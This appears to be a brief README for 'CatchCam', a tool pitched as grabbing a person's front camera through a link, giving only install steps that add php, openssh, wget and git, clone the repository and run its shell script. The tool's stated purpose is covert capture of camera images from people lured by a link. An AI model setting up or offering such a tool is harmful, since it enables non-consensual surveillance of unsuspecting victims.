# CatchCam
Grab Frontal Camera Using A Link

```

​apt-get update -y

apt-get install php -y

apt-get install openssh -y 

apt-get install wget -y

apt-get install git -y

git clone https://github.com/Ch33chOficial/CatchCam.git

cd CatchCam

bash CatchCam.sh

```